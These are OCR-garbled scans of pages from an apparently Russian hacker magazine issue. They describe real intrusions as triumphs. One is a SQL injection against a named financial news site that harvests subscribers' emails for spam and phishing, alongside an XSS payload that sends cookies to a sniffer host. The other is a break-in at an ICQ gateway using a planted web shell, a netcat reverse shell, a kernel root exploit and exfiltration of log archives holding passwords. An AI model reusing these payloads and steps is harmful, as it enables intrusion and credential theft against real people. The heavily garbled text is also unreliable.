«_хсрС1оокир», осуществляемый в основном блоке кода, то есть не 
«шунтируемый» никакими ветвлениями, что очень хорошо: 



Дизассемблерный фрагмент 
библиотечной функции ХсріРіІІег 






. ВехВ : 00401С9А ХсрВРіІВег 


ргос 


пеаг 


. ВехВ : 00401С9А 






. СехВ : 00401С9А агд_0 


= дмогй рСг 8 


. СехВ : 00401С9А ЕхсерВіопІпРо 


= дшогб. рСг ОСЬ 


. СехВ : 00401С9А 






. СехВ : 00401С9А 


ризк 


еЬр 


. СехВ : 00401С9В 


тоѵ 


еЬр, езр 


. СехС : 00401С9Б 


ризк 


еЬх 


. СехВ : 00401С9Е 


ризк 


[еЬр+агд_0 ] 


. ВехВ : 00401САІ 


саіі 


_хсрСІоокир 


; _хсрШоокир ? ту_іпѵізіЫе_ 


зек 




. ВехВ : 00401СА6 


СезВ 


еах, еах 



Обнаружить наш обработчик исключений практически невозможно. 
Он отсутствует в 5ЕН-цепочке (точнее, присутствует, но прячется 
внутри обработчика, устанавливаемого ПТБ языка высокого уровня), 
и Ольга в упор его не видит. Конечно, при пошаговой трассировке 
хакерский обработчик будет выявлен, — вот только трассировать 
мегабайты системного и библиотечного кода никто не будет. Дизас- 
семблированиетакже не покажет ничего подозрительного, поскольку 
Иа Рго не проверяет целостность библиотечных функций, и никто из 
хакеров не тратит время на иханализ.а потому предложенный прием 
оказывается весьма живучим в плане взлома. НС 
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Не только названный проект отличается бажностью. Поковыряй другие и 
найдешь много интересного 



1азі_ріпд 

таі1іпд_1ізі 

тзп_іуре 

тзпЬЬ 

роіі 

ро11_с!аіа 

Соіитпз: ТаЫе таі1іпд_1ізі 
етаіі 
ссіаіе 

Напоследок сокрушив СУБД запросами вида: 

• ТШір: //Ьизіпезз . га.тзп. сот/тзп/ѵіеѵ\г_агііс1е .рЬр?іс!=- 
1+ШІОЫ+АЬЬ+ЗЕЬЕСТ+1 ,сопсаі ( ЬаЫе_зсЬета , 0x3а , ЬаЫе_ 
пате , 0x3а , со1итп_пате) , 3 , 4 , 5 , 6 , 7+ігот+іпіогтаііоп_ 
зсЬета . соіитпз 

• ЪЬір: //Ьизіпезз . 2 а .тзп . сот/тзп/ѵіем_агііс1е . рЬр?іс!=-1 
+ШІСЖ+АЬЬ+ЗЕЬЕСТ+1 , етаіі , 3 , 4 , 5 , б , 7+ігот+таі1іпд_1ізі , 



[Ыі:тт:02] [ШРО] СЕТ рагатеіег 'ісП із сіупатіс 
[Ыі:тт:02] [ШРО] іезііпд зд| іп^есбіоп оп СЕТ рагатеіег 1 ісР 
[Ыі:тт:02] [ШРО] іезііпд питегіс/ипезсареЬ іп^есііоп оп СЕТ 
рагатеіег ' ісі ' 

[Ыі:тт:02] [ШРО] сопіігтіпд питегіс/ипезсареЬ іпзесііоп оп 
СЕТ рагатеіег ' іс[' 

[Ыі:тт:02] [ШРО] СЕТ рагатеіег ' ісГ із питегіс/ипезсаресі 
іпз есіаЫе 

[Ыі:тт:02] [ШРО] іезііпд іі СЕТ рагатеіег 1 саі ' із Ьупатіс 
[Ыі:тт:02] [ШУШШС] СЕТ рагатеіег 'саб' із поі сіупатіс 
[Ыі:тт:02] [ШРО] іезііпд іог рагепіЬезіз оп і^ есіаЫе 
рагатеіег 

[Ыі:тт:02] [ШРО] іЬе іп^ есіаЫе рагатеіег гедиігез О 



рагепіЬезіз 

[ЬЬ:тт:02] [ШРО] іезііпд Му ЗОЬ 

[Ыі:тт:02] [ШРО] диегу: СОЫСАТ ( СНАК ( 5 3 ) , СНАК(53)) 
[ЬЬ:тт:02] [ШРО] геігіеѵесі: 55 

[ЬЬ:тт:02] [ШРО] регіогтесі 2 0 диегіез іп 0 зесопЬз 
[ЬЬ:тт:02] [ШРО] сопіігтіпд МуЗОй 
[ЬЬ:тт:02] [ШРО] диегу : ЬЕЫСТН (СНАК ( 53 ) ) 

[ЬЬ:тт:02] [ШРО] геігіеѵей: 1 

[ЬЬ:тт:02] [ШРО] регіогтесі 13 диегіез іп 0 зесопЬз 
[ЬЬ:тт:02] [ШРО] диегу: ЗЕЬЕСТ 5 РКОМ іпіогтаііоп_зсЬета . 
ТАВЬЕЗ ММІТ 0 I 1 
[ЬЬ:тт:02] [ШРО] геігіеѵесі: 5 

[ЬЬ:тт:02] [ШРО] регіогтесі 13 диегіез іп 0 зесопсіз 
Ьаск-епЬ БВМЗ : МуЗОЬ >= 5.0.0 



Будем считать, что у нас все получилось. После детального изучения и 
кропотливого подбора мне удалось получить структуру БД. 

БаіаЬазе : тагкеіѵіемз2 
іпіогтаііоп_зсЬета 
тагкеіѵіеѵѵз2 
іезі 

ТаЫез :таі1іпд_1ізі 
агіісіе 

агііс1е_соттепі 

агііс1е_соттепіз 

агііс1е_іуре 

аиіЬог 

сгіскеі_гези1із 

сіаіе 

депегаі 

іпѵ_іірз 



я получил почтовые адреса подписчиков ресурса, которые интересуются 
финансовой тематикой. 

Такие вещи для хакера всегда актуальны, особенно при перепродаже 
баз спамерам, занимающимся контекстной рассылкой по финансовой 
тематике. Или просто при проведении специальныхузконаправленных 
атак на владельцев этих почтовых адресов. 

г ИМИТИРУЯ Х55 

По-хорошему, эта басня преподнесла мне следующую мораль — брать на 
ресурсе нечего. Впрочем, на всеестьсвое«но».Уместныйтрюквтаком 
случае заключался в проведении фишинг-атаки. Для этого, с целью 
кражи конфиденциальных данных, я решил произвести рассылку писем 
всем подписчикам ресурса. В рассылке приложил письмо, содержа- 
щее Х55. Но из-за того, что на ресурсе Х55 не наблюдалась, я решил 
ее просто сэмулировать. Для достижения цели было принято решение 
применить следующий трюк. 

1. Составляем тривиальный 35-запрос вида: 

<зсгірі>а1егі ( 'ХЗЗ ! ' ) </зсгірі> 

2 . Кодируем его в НЕХ, используя онлайн-конвертер сІо[сеѵіе.сопп/]5/ 
сопѵегІег.ЫтІ . После чего подставляем в текст письма, конструируя 
запрос в обходАРІ кбазе: 

зеіесі * ігот зоте_іаЫе ѵйіеге іс!=-1 ІЖІСЖ АЬЬ ЗЕЬЕСТ 
1,2, 3,4, 5, 6, 0х3с73 6372 697 07 43ебі бсб572 742 82 7 6833 63 6Ьб 
96е67202Ь207а6с6і2 1212 1272 93с2і73 6372 697 0743е 

3. Так как элемента с порядком «-1 » не существует, то по логике вещей 
«звездочка» будетзаменена на 

ХХХХХХХХХ 1,2 ,3,4, 5,6, 0х3с73 6372 6970743е61бсб5727428276 
833 63 6Ь696е67202Ь2 07а6с6і21212127293с2 І73 6372697 0743е 

4 . В итоге, база вернет кашу, которую мы завари... то есть, закодировали 
ранее: 

0x3 с73 6372 697 0743 еб 16с 6 572 7 42 827 6833 63 6Ь69 бе 672 02(12 07а 
6с6і21212127293с2і7363726970743е 

5 . На выходе получаем вполне себе ядовитый линк: 

Ьіір : / /Ьизіпезз . га .тзп . сот/тзп/ѵіеѵ\г_агііс1е .рЬр?іс!=- 
1+ШІОЫ+АЬЬ+ЗЕЬЕСТ+1 ,2 ,3 ,4, 5, 6 , 0х3с73 6372 697 0743е6 
16с6572742 827 683 3 63 6Ь696е672 02Ь2 07а6с6і212121272 93 
с2і7363726970743е 
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взлом 



» 



ігір: ,і'/ои5Іг»“55 , м гояі . оогп/пмгѵѵіе^ аі*ісе.лЬл?зск- 1 -ипш+$еІесІ-і ДО'Гі.Дгуі іАРк^О гА»Й : ■*>, 

•□• т т ,СМШ) .снар ( 1 ] 0). с нам; і се) , снар і і і екнамэе). с\т т, о ^ { [ 5),снав(і і.&) , 
снар< зг) ,<:и.АР( юзьс нам і о і ) , сидр і: ) . сидр ! 1 1 2 ), с нар :ю8). снщ : : ?).ц*( іі53. снар* з?) , 

СНАРШ'і &ШШ\ )зСНАР.(97).СНАЯ( 1 1 2КЙД8ШІ СНАЯІ32І СМАР( 1 0Э}.СНАРО 0.І І.СНЙКОЙ, 

С ИСРХ А ігі.д і №( 1№ , № Н І 1?Ш № 1 1 5) ,СНА К'3 2) , СМАК! 1 Р2К Щ і Л )■ С Н№< 1 } 4КГШ ШІ ., 



снар(4ч •' . снарш ,с тш Ф сидр,.; іо р . с на р і' з г>. с нар : і : г ), сндр ( і ^ : ■ , 
ІН*Р< з : I . С Н АР ( Ш 5 ?л НАМ 1 Ш) , С НАМ 1 16) '. нар ■ ] і; ] ) , С НАР : 1 . № МИАР..; ■ і 



тшмт, 

У Ю^ ліА Р№ \ 



ІГНАЯС II П) .СНДРЦі ЙІ.СНДКИб) СНАМ' Я?). ГНАКГ73).ГНАйГ ЕОО). ГИДР 



ПАРС 1 І^ЦТ-АЙі'І 1 і-і і . Г И А Р (?і ?) . Г Н Д Р { I Г9) ГНДРі 1 1 1 1.ГНДР; ИП).ГНА5№) 


.гнан/ш 


4Ш4ДПГ9Л. 


ГНДРС ? 3-АР 01 -.1.1 ЧАР (1345 X НАР П П ] ) ( НДР і - ? з . ( НДР ! 1 1 1 1 ). С НДЧ : п 


АСНАРГЗ 


гісНАкгіой. 


Г НАРС 1 11 1 і .1. РА Р г ■■■' .і НАР С 3 1 В-:) . і НДР ГН 1 "і ( НАР (’Л? \ ( НДР ’ ‘ Ы і . і НАР. : 1 ! : ) 


.СНИНОІ 


5),ГНАРП 17). 


СНАР( 1 Э 1 ).СЬДЯ.(99).С НАР/ 3 1 ь) . СНДР Г 11 1 ) С НАР.Г 1 1 4) . сндр.; У 7 ) . СНА -ч; : 05) 


.СНАНОІ 


5) . С.НАРС32) і 


■1НАРС 1 1 61.г> АРО И ) . СИ ДР (1 1 У ) .С Н А Р (1 1 ь) . СИ ДР Г 1 С 1 ) ОН А Р.і -і Л СНДР СНУ 


рі.сндріе 


7 1 , СНДР(32’і . 


СНАМ І ІЙ.СНДИІВ5) .СНДРС 101 1.СНААНб) ЙНДЙ( Заі.СНЙЙГбвІ.ОНАІЫ 110),( 


ІНАРНоё 





днлрл іщёщ жшёшш і дщі 

" і СО ) .СКА ?( 97 ) , СЧАРГ ] ОБ! , СНАР Щ ь .■ , СНА Р( 44 ) .СИДР/ 32 ) ,СНАР.і 5? )■ СНА !- 
• : ] 5 ) ЛІНАЧС : : 6), СНАРі 1 ЗИ , I НАР Г 1 09 ■ . О-АР.^34 ■ . СРЛР <10?) .СНЛРС 101 ‘і. СНАР У 12У СНАР.Г 
■97). СНУК 1 ІБІ.СЧАРГЗЦ.ЗЧАГ.П ЗЦ.СРАР/І ] 7) .СНАМ ШБССНДП/СО .СНДП.І 1 ] г У СНАР. ! 1 



НАГЧ?? ' , СНАР/ 32 ) ,СРАР( 1 1 ь) ■ СНАРЛ 1 ] 4) .СНАР Г 111). СНДР/ 1 ] ?\ СНАЦ : 

■ • , СНА Р.( 13 ] I , СНАР/ 115) ,СНАП/ 1 1 6 ) , СНАГЦ 1 С I) СНАР.' 32 У СНАМ 1 1 
97), СНУК I ОБ) ,СЧАР( 1 051 ■ = НАР ( 1 ЗЗ'і , ІЬА Г/ ] 3 1 і ■ СИ АП ■!-! 1 ) ■ СН ДР/ і С '■ СНАР Г 105 У СНАР/ И 



ІНЛР 

2І.СНАЙ 

шав 



ГЭ2. 



'іі оі ).о Щ і і я. о та ібѴ.аі&Ѵэ2) ,сі іаік іобШнлкс 1 і?) а Ш і і 



ОНІАЙ. 

СНАЗ 



Г10П.СНАРШ.О т ] о: :,МАР[І ] О). П -др.Шлі-ідрі і іи, а іарг і н) а іар.; ?7\.:і ідр ; : ос), сидр 
1 1 ,1 йШййШ.ЕІ Ші і Ш). , С а® ( і .0. і V ЖЖЙй Ш ШЙ2ШШ 1 1 1ШШЗПШШ І ЩійШЙ 
№ )н:ндр( : :■?),•: нар ( з: . , : ндр ■ ? м , сндр ( ш )л нар з о?) , сндр :ндр кп снар : зг ), снар 
МД -ндр.; : : о), с нар { з:; , снар а сю), снар ( пеі , снар ап) ,сндр,; і оз) , сидр ; 1 1 ?) .снар. і с і), снар 
< :тчч <: , снар (4^і , : иАр № , с нар( ? 2 ) с ндр ■-■=), снар ; і п , ■ ■ :и д=> : : ) ■ сндд^^ : , :-иѵр{ ■ , 



С НАР^' , С НА Р< 1Н ) .Сна- ^: ИАИ- :і Ю ).СНД ^ Ю5) г СНА Р С Іі5' 

• ЛАРЛ і 5ѵ>АР . С і 1 ?).С ^В(З г )лНАЩ 1і 7) СНАР' ] Ю,СН АР. :,^),С НАр .(і:! 



снав^; 

I. СнАРи! ' 



СНАРЛО^Ѵ 

).С№К0 



гндр( 1 1 4).андр.(7?іЗ] .снйд/з? 1 ) ,снан< іт) сн н дв ■ і ^).гнай^?).гнав( 



Н^№иТНДКГі тЧлИАЙНН:!'! СНАБі>4), Г НА К і'\? 1, : С НАК Г' ЕП ] 1 



Ж 



П З ’ПСНДРЛ Ш).ГНАЧ№ 



СНАР Л 1 7).СНАР.а 1 5?.СНДР.(32).СНАР.< 115) СНАЙ Л □ Л.€НДЯ:зг). СНАРЛ 3 5).СНАЕС 
:НАР< 1 3 1 >,СНАР/ ПБ). СНАР Г 1 16 ) НАР Г НА) '.НДР і I Сг ) К НДР ■ ] и ] І . і_НДР.;Чь;і . СНДР. 



ГНДР(ІПВ). 



СНДР(д7) .СНЙР^10з).СНАР.а 15ІСІ^И32)ХНАВІ233Ѵ І I ЬУСНДРЛ : ■ 



Шк 



СНДР^ 1 ОЗиіНАІчЛСіІІ .СНДР.< ІО^ІиСНАЙііаП.СНАРі 1 Ш ^ .СНАМ 1 16>.СНДР.Ч<Ѵ 



Ми 



СИДР л 05 >, 



СНЙМ 1 СЙ>.СНДЙ^З.Он’АЙ^>. СН^МІ1^І,СНА,М'1 ] 5УСНАР( ■ 1 7І ОНАЙЛ а-РССН^ЙЛСН] , СНАЙС32) . ~ 



сндр<э &1 ,снарл 1 1 ^анййат) ,снш 1 12 ) <±нак.; ше), снарі 235 индд; і 



СН/||Р( 1 аі Ѵ.&\№ 11 01 ,СНАР( 1 16\^АШ4)-СН№32), СНАіР^і.гК'-АГ Е 1 



^■0^3 . 



СНАРЛ ОдканАК^^СНАП Л2Й) ,СНАй^5)іа, 4.І5.7, Ф 



і(т 



Обноэнгь 



^ Сораттй как 



■ а Удгмі-тгь 






-1 



этой техникой оставления Х55ты сможешь избежать громоздких выра- 
;ений. Таких, что испугаютлюбого, даже малопонимающего в безопас- 
ости пользователя 




т 



еменные окр 



геДигпсосІе , геДигптзд, Ьеасіегз = Ъ . деДгерІу ( ) 
<ТаДа=1і . деДТіІе ( ) .геасЦ) 

гі = ге . сотрііе ( ' оТ [0123456789,]* гезиІДз') 
гезиІД = гі . Тіпсіаіі (<іаДа) 

ІТ гезиІД == [ ] : 
ргіпД "N 0 гезиІДз : (" 
зуз . ехіД ( ) 



После открытия клиентом такого линка появится диалоговое окно, стало 
быть, Х55-на падение выполнено. 

Естественно, я не стал паковать аіеіі-сообщение, а сделал разумное 
обращение на мой снифер: 

<зсгірС>ішд = пехѵ Ішаде ( ) ; ішд.згс = "ТШСр : / /ЪозС . ги/з/ 
з . діТ? " +(ЗоситепС . соокіе ; </зсгірС> 

В качестве адреса снифера можно воспользоваться публично доступны- 
ми и не изобретать велосипед. К примеру, снифером портала АпІісЬаЕ 
ги [ апбсбаЕги/сді-Ьіп/зз рд) или старейшим ресурсом по безопасности 
ЬирТ/оШ.апбсЬаЕги/зпіШіод.рІір . Существует также снифер портала 
Меізес.ги: е ес.ги/Ваш >гинл 

После чегоделоза малым — как говорится, греби логи пачками. Носле- 
дует иметь в виду, что на снифере имеется ограничение в бкзаписей. 

В ДОБИВАЕМ М5Ы 

После падения ресурса ботаіпзбЬ.пеІ многие не могли приспосо- 
биться под новые приемы осуществления Веѵегзе ІР-[оокир — техники 
выявления сторонних проектов и сабдоменных аккаунтов на ІР-адресе. 

В этом плане М5Ы можетздорово пригодиться. Через поисковую систему 
5еагсЬ.М5І\І.сот вполне реально сделать все вышесказанное, указав в 
поиске специальное уточнение «ір:». 

Многие хакеры уже давно втихаря юзаютэту штуку. Пора бы приоткрыть 
над ней за весу тайны. Для автоматизации запросов напишем простень- 
кую функцию, которая позволит использовать кэш М5Ы для получения 
сайтов, размещенных на отдельно взятом ІР. 

сіе! Ьоѵтшапу (ѵ^) : 

Ъ. = ІЩДрІіЪ . НТТР ( 1 зеагсЬ . шзп . сот 1 ) 

# посылаем СЕТ-запрос, имитирующий наш браузер 
Ъ. . рибгедиезб ( 1 СЕТ 1 , 

" /гезиібз . азрх?д=ір : " +Ѵ7+ " &ЕОЕМ=ОВНР" ) 

Ь. . рибйеабег ( * Нозб 1 , 1 зеагск . шзп . сот 1 ) 

Ь . рибйеабег ( ’ ІІзег-адепб ’ , 1 Іпбегпеб Ехріогег 6 . 0 ’) 

Ь. . епбкеабегз ( ) 

# получаем исходный код страницы результатов 



МЗІМ-хитрости 

Иногда важные запросы совсем вылетают из памяти. Ниже 
приводится шпаргалка для хакера. 

ДЗагруженность базы данных в настоящий момент: 



Д Просмотр установленных плагинов МуЗОЬ: 
1іі:і:р://Ьи5Іпе55.2а.т5п.сот/т5п/ѵіеѵу аггіс1е.рйр?і<і=-1+Ц№ 
ОИ+АЬЬ+5ЕЬЕСТ+1.РШСІИ ИАМЕ.3.4.5.6.7+&от+ш^огта1 
іоп зсІіета.РШСІИЗ 

ВЯ Их содержание напрямую опирается на референсы 
(<іеѵ . тузді . сот/йос / гебтап/ 5 . 1 /еп/ріидіп-арі . 

Ьйті). НаузлеМЗИ, как видишь, используются достаточ- 
но стандартные дополнения, а именно: Віп1о§, рапіиіоп, 
АКСНІѴЕ, ВЬАСКНОЬЕ, С5Ѵ, ЕЕИЕКАТЕИ, МЕМОКУ, ІппоИВ, 
МуІЗАМ, МКС_МуІ5АМ, пбЬсІизіег. Они бывают актуальны, 
когда, ориентируясь на уязвимости, найденные в каких- 
либо функциях модуля, нужно выполнить запрос в обход 
АРІ, совершить атаку на отказ в обслуживании и многое 
другое. 

ДПросмотр переменных глобального окружения МуЗС^Ь: 
1іі:і:р://Ъи5Іпе55.2а.т5п.сот/т5п/ѵіеѵѵ а№с1е.р1ір?іб = - 
1+Ц№ОМ+АТ.Т.-і-5ЕЕЕСТ-І-1.сопсаі: уѵ5С0хЗа , ѴАВТАВТ.Е 
ИАМЕ.ѴАКІАВЬЕ ѴАШЕ1 .3.4.5.6.7+Ггот+іпГогтаИіоп 

ДНаиболее интересная информация, которая была получена 
из запроса, за исключением технических настроек и подроб- 
ностей функционирования: 

Нозйпате: піз07 . зЬагепей . со . га 
Ѵегзіоп СоттепД : МуЗОЬ Соттипійу Зегѵег (СРЬ) 

Ѵегзіопз: 5.1.17-Ьека 
Ѵегзіоп_сотрі1е_тасЬ.іпе : І686 
Ѵегзіоп_сотрі1е_03 : рс-1іпих-дпи 



► 0б2 



ХАКЕР 12 /120/ 08 





Еог х іп гезиІС : 

сіеап = ге . зиЬ ( ' оТ' , 1 1 ,х) 
сіеап = ге . зиЬ ( ' гезиІСз ' , ' ' , сіеап) 
сіеап = ге.зиЬ( , сіеап) 
геСигп сіеап 

Йеі гип Ы, і) : 

Ь = ГШСрІіЬ . НТТР ( ' зеагсЬ.шзп. сош' ) 

Ь. . риСгедиезС ( ' СЕТ * , 

" /гезиІЕз . азрх?д=ір : " +ъг + " &РОЕМ=0ВНР&1ігзЕ= " +зЕг ( і ) ) 
Ь . риСЬеасІег ( ' НозЕ ' , ' зеагсЬ . шзп . сот ' ) 

Ь.риЕЬеасІег ( 'ІІзег-адепР 1 , ' ІпРегпеЕ Ехріогег 6 . О ') 

Ь . риСЬеасІег ( ' Соокіез 1 , 

, 8К(ЗНРШак=ЫЕШШ=0&АВЪТ=ВЕМОТЕ&ШЗЬТ=50&МКЗРН=1; ' ) 
Ь . епсШеасІегз ( ) 

гекигпсосіе, геЕигпшзд, Ъеасіегз = Ь . декгеріу ( ) 

сіаЦа=Ъ. . декіііе ( ) .геасі() 

сІаРа = ге . зиЬ ( ' <и!> ' , ' \п ' , сІаРа) 




гі = ге . сотрііе ( ' <1і с1азз= " ІігзЕ "> [ А <] *</1і> 1 ) 
гез = гі . Ііпсіаіі (сІаРа) 
геСигп гез 

Кслову, такиетрюки можно делать почти через каждый популярный 
поисковик, опираясь на его индивидуальные особенности. Скажем, 
мощь индексации Ооодіе здорово пригодится в деле выявления сабдо- 
менов. В свое время п4поЬі1, еще будучи в известной русской команде 
Не11КпідЫ:5 Сгеѵѵ, опубликовал статью, посвященную использованию 
четырех крупнейших поисковых систем для автопоиска уязвимых про- 
ектов и автошелла ресурсов с целью осуществления 0005-атак. Полный 
исходный код такой программы ты найдешь на нашем диске. 

Н ПОБЕДА БУДЕТ ЗА НАМИ! 

Мы выжали из М5ІЧ все, что могли. Можно бежать за шампанским и 
праздновать победу. И так будет с каждым ресурсом, который попадет- 
ся под мою отчаянную лапу. Главное, — проявитьуважение кавторам 
проектов и не уничтожать все на своем пути. Ата кже понимать, что 
ответственность за последствия взлома н есет только хакер. ЗС 



Обращай внимание на плагины. Их можно эксплуатировать в зависимости от содержания в них багов 




БЬоѵѵіпд 1-205 01* 205 ( ЕДіЕ , Заѵе, Щ/, Рее сП 



ш# 


Раіе 


Тѵпе 


5Еа1и5 


5йѴ 


Ѵег5Іоп Тагпеі 


05 


5иттагѵ 


А55І(№В(] 


7476 


2004-12-22 

11:52 


5егѵег 


СІ05ѲСІ 
(1347 СІэу 5) 


53 


5.1 


У пик (иіпух) 


сгазЬ оп ЗЕЬЕСТ * РРЮМ 
ІМРОР.МАТЮМ_5СНЕІ4А.ТА81Е5 


5егсеу 

СІиРіоѵ 


0412 


2005-0 3-26 
15:50 


Зегѵег 


вцд 

(522 бау5) 


53 


5.1 


Ііпин (5Ю5Е 9,2) 


Тгіддегз: зііоиісі Наѵѳ Ігіддег ргіѵііеде 


Аіехапсіег 

Щ2Й1П 


10865 


2005-05-25 

21:13 


Зегѵег 


С1о$ей 
(1250 йауз) 


51 


5.1 


І_іпин (Упих) 


51аѵе Сіизшг согѳз ипсіег Иеаѵу 

іоасі 


Ма*з 

КіпсІаИІ 


11349 


2005406-15 

14:41 


Бегѵѳг 


Сап'і герѳаі 
(1220 сіауз) 


51 


5.1 


Упик (Іипих) 


зегѵег сгазіі ѵ\Феп геЬгіеѵіпд гші: аі( 
го Ігогл а сигзог 


Копзіапйп 

Одіроѵ 


12097 


2005407-21 

23:57 


Вегѵѳг 


СІ05ѲСІ 
(1182 сіауз) 


53 


5.1 


Упих (КНЕи 


Рапде апсі ІігЪ ехргеззіопз деЬ 
поп-ііхесі іп рперагей паштет: 
ргогосоі 


Мі.кае.І 

Воп^ощ 


12116 


2005407*22 

16:53 


Зегѵег 


СІовесІ 
(1194 гіауз) 


52 


5.1 


Упих (Упих) 


РагйбопесІ О КОЕ К ВѴ диегіез сап Ш 
оп а 64Ьі^рІаЙогт 


МікаеІ 

Роп^гот 


13154 


2005409-13 

22:41 


Зегѵѳг 


СІо^ееІ 
(1144 гіауз) 


51 


5.1 


Упих (ііпих) 


Іпаегбпд сМа іпІ:о МуІ5АМ ЬаЫе 
РАКПТІОМ ВУ КЕѴ саизез туздісі соге 


МікаеІ 

Р.опзЕгот 


13976 


2005-10-12 

21:55 


Вегѵег 


СІшзес] 
(1116 йауз) 


52 


5.1 


Упих (Ресіога сЗ) 


5егѵег СгазП 


МіоиеІ 

5оІоггапо 


14293 


2005-10-25 

11:50 


Бегѵег 


СІоэеб 
(1078 йауг) 


53 


5.1 


Упих (Упих АМ064) 


Ресіегаіесі Гаііз іп 5.1 


Распек 

<33іьгаі№ 



Готою 
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ІСО: НЕОЧЕВИ 



УГРОЗА 



КРАСИВЫМ ЗАХВАТ ТЫСЯЧИ УИНОВ 



Так уж сложилось, что ІСО стала моей любимой темой в журнале. Асечные 



ІЛІЧ’ы прямо-таки м анят своими красивыми сочетаниям и цифр и создают 
непреодолимое . На этот раз я про- 



должу начатое в номере за май 2007 года и вновь совершу жестокий акт ван- 



дализма над израильским ѴѴАР ІСр-шлюзом Ц'аЕ.сош, который, как ты уже 



знаешь, очень любят админы аськи. 



ервый взлом ЦаСсотя совершил в конце ноября 2006 
года. Взлом оставался нераскрытым до февраля 2007-го. 
За это время я собрал тысячи красивых (инеочень) уинов 
с этого сервиса. Если ты погуглишь на тему «^аСсот взлом», то смо- 
жешьувидеть, какой резонанс мое хак-действо вызвало в Рунете и, в 
частности, в сообществе асечников. 

Хек был довольно банальным: локал-инклуд на главной, затем инклуд 
шелла в логи сервера и, наконец, инклуд этих самых логов в главную 
страницу сервиса. Тогда админы поступили очень про сто: закрыли л о- 
кал инклуд и сменили юзера логов на гооі, чтобы даже при повторном 
взломе никто не смог прочитать логи сервиса (заметь, официально, 
по утверждению админов і\аі, никакие логи на сервере не ведутся]. 

Я, конечно же, расстроился, но на будущее все равно припас старый 
добрый г57-шелл на і^аСсот по адресу Іюгитз.^аЕсот/рЬрВЕ^/ 
Іапаиаае/Іапа икгаіпіап/404.рЬр (форум патч еный, так что не надейся 
на его взлом :]). 

Шелл благополучно лежал незамеченным на протяжении полутора лет. 

И воттут началось самое интересное. Перекапывая свои старыетексто- 
вики, я наткнулся на этот пресловутый шелл, зашел в него, посмотрел на 
каталоглогов под рутом, затем глянул на версию ядра и обомлел, пора- 
жаясьсвоей недальновидности. ЯдроЛинуха было старое, уязвимое и 
ни разу не патченное: 



Ьігшх Сз аС-згѵ-шаіп 2.6.15-1. 2 054_РС5зшр #1 8МР Тие Маг 
14 16:05:46 Е8Т 2006 І686 

По своему богатому опыту я прекрасно знал, что ядрышко очень хорошо 
раскалывается эксплойтом с нашего любимого тіІѵѵОгт.сопп под 
названием «Ыпих Кегпеі 2.6.1 3 <= 2.6.1 7.4 ргсЛО І_осаІ Рооі: Ехріоіі» (на 
милворме пять модификаций данного сплойта, но разницы особой они 
не имеют]. Но обо всем по порядку :]. 

Н ШАГ ЗА ШАГОМ 

Итак, зайдя на свой старый шелл по адресу ШрУЛогитз.раЕсот/ 
рЬрВВ2/[апаиаае/[апа и кгаі піап/404. рЬр . я попытался встроенными 
средствами р57 забиндить порт 1 1457 для подключения к/Ьіп/Ьазб с лю- 
бого компа через РиТТѴ, так какдля сборки и запуска ядерного сплойта 
требовался интерактивный шелл. 

г57зЬеи скрипел, пыхтел, долго грузил страницу, нотаки незабиндил 
шелл ни через Регі, ни через Си-исходники. «Чертов файрвол!» — по- 
думал Штирлиц. Но разве это преграда для матерого хакера? В г57зЬеи 
естьтакое прекрасное средство, как Ьаск-соппесС которому нипочем 
практически любая «огненная стена». Для использования бэк-коннек- 
та мне понадобилась известная утилита пеШаС а также один из моих 
виндовых дедиков. Неткатя благополучно скачал на веб-хаке (ссылку, 




► 064 
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Успешная работа бэк-коннектв неткате 



как обычно, смотри в сносках], а на дедикзашел через 
встроенную утилиту винды шзСзс (Пуск Выполнить -> 
тзізс]. Зайдя на дедик, я благополучно распаковал виндо- 
вую версию нетката в С : ХпеСсаЩ затем запустил его через 
всетотже стб на прослушку 1 1457 порта: 

С : \пеВсаВ\пс . ехе -1 -р 11457 

Теперь мне оставалосьтолько вбить в бек-коннект ІР-адрес 
своего дедика и нажать кнопку «Выполнить», что я благопо- 
лучно и сделал. 




Мой старый г57збеи на сервере 



Н ИНТЕРАКТИВНЫЙ ШЕЛЛ 

После запуска Ьаск-соппесТ р57-шелл выдал мне радост- 
ное: «Ыом зсгірС Сгу соппесС Со 89 . ххх.ххх.ххх рогі 
1 1457 ...», а пеісаі: на моем дедике успешно показал вывод 
команды іб: «иіс!=99 (поЬосІу) дісІ=99 (поЬосІу) дго 
ирз = 99 (поЬосІу ) , 53 6 (падсшй) ». Текущие права, естест- 
венно, меня неустраивали :). Теперь нужно было скачать, 
скомпилить и запустить вышеуказанный ядерный сплойт. 
Скоп и пасти в содержимое Ыір ://тіІѵѵ0гпп.сопп/ехрІоі1:5/2005 
ксебе втекстовик, я сохранил его под названием га р1ог_ 
ргсШ .с и залил с помощью все того же г57зЬеІІ в директо- 
рию /изг/1оса1/арас1іе_1 . 3 . 37/ЬСсіосз/Тогиіп/ 
рЬрВВ2 /1апдиаде/1апд_икгаіпіап. Далее, зайдя в 
интерактивный шелл на дедике, я выполнил следующую 
последовательность команд: 

сЬтюсІ 0777 гарСог_ргсС11 . с 

дсс гарСог_ргсС11 . с -о гарСог_ргсСІ1 -Шаіі 

. /гарСог_ргсСІ1 

После запуска последней команды сплойт начал 
свою адскую работу. Оставалось только подождать 
несколько минут до завершения получения привиле- 
гий рута. 



н коот 

По истечении каких-то 2 минутя увидел жизнеутвержда- 
ющий вывод команды іб: « и ісІ=0(гоо1;) діб=0(гоо1:] дгоирз= 
99(поЬобу],536(падстб)». Радости моей не было предела 
:]. Оставалось затариться новой порцией живого пива 
и думать, как быть дальше со скачиванием и парсингом 
асечных логов. 

Выполнив команды «сб/и5г/ІосаІ/арасЬе_1 .3.37/Іодз ; Із 
-Іа», я увидел то, что та к дол го хотел заиметь — гиговыелоги 
доступа с паролями и уинами. 

Таккакмой дедикимел некислое подключение к интернету, са- 
мым оптимальным вариантом было: заархивировать всю папку 
слогами и слить ее ксебе на дедик. Это я сразуже и сделал: 

Саг сг^ѵ /изг/1оса1/арас1те_1 . 3 . 37/1Шс1осз/ 
:5огит/р1ірВВ2/1апдиаде/1апд_икгаіпіап/Во1іа1 . 
Саг . дг /изг/1оса1/арас1те_1 . 3 . 37/1одз/* 

В одной директории с шеллом успешно создался 1 084-мет- 
ровый архив со всеми логами «тжата». Натравив Оперу 
моего дедика на даунлод этого пресловутого архива, я ушел 
вмагазинзановойпорциейпива.В запасе у меня было 
10-15 минут. 




> ѵѵагпіпд 

Вся вышеописанная 
информация предо- 
ставляется исключи- 
тельно к раз- 
мышлению. Ника- 
кая часть данного 
материала не может 
быть использована 
во вред, в обратном 
случае ни автор, ни 
редакция не несут ка- 
